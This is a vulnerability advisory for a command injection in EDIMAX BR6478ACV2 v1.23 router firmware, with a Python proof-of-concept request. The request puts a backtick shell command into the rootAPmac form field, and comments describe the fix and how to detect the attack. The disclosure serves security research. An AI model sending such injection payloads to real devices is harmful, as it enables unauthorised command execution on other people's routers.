BR6478ACV2_v1.23
The EDIMAX BR6478ACV2_v1.23 firmware has a command injection vulnerability in the formiNICbasic function. The v432 variable receives the rootAPmac parameter from a POST request. Because this value is user-controlled and is passed to a system() call, it can be used for command injection.

import requests

# Proof-of-concept request for the formiNICbasic command injection described
# in the advisory above. The script does nothing but send one POST and print
# the response object; it has no computable result and no error handling.

# Address of the device under test, as given in the advisory.
ip = "192.168.2.1"

# Form fields accepted by the /goform/formiNICbasic handler. Most are sent
# empty; only mssidSelect, wlan0Enable, doConnectTest and rootAPmac carry a
# value.  Which of these fields the handler actually requires is not shown
# here — it is inferred from the advisory's request, not from firmware code.
data = {
"use_apmode": "",
"mssidSelect": "0",
"enableMSSID": "",
"wlanDisabled": "",
"wlan0Enable": "1",
"isRepeaterBasicUI": "",
"vlanid": "",
"wireless_block_relay": "",
"apMode": "",
"band": "",
"secchan": "",
"chan": "",
"hiddenSSID": "",
"hiddenSSID2g": "",
"autoMacClone": "",
"ssid": "",
"repUseCrossBand": "",
"force_enable2g5g_ap": "",
"method": "",
"iqsetupclose": "",
"submit-url": "",
# doConnectTest="1" is the code path in which, per the advisory, rootAPmac
# reaches system() via the v432 variable.
"doConnectTest": "1",
# Injection point.  A MAC-address field should only ever accept hex digits
# and separators; a server-side allow-list check (or building the command
# with execve-style argument vectors instead of system()) is the fix.  On
# the detection side, shell metacharacters such as backticks and quotes in
# this parameter are a clear indicator of an exploitation attempt.
"rootAPmac": "'`ps>/1.txt`'",
"isApply": "",
}

# The vulnerable handler; no authentication is performed by this script, so
# whether the endpoint requires a session is not established here.
url = f'http://{ip}/goform/formiNICbasic'
# verify=False has no effect on a plain http:// URL; it only matters if the
# device is reached over https.
res = requests.post(url=url, data=data, verify=False)
# Prints the Response object (status code), not the response body.
print(res)
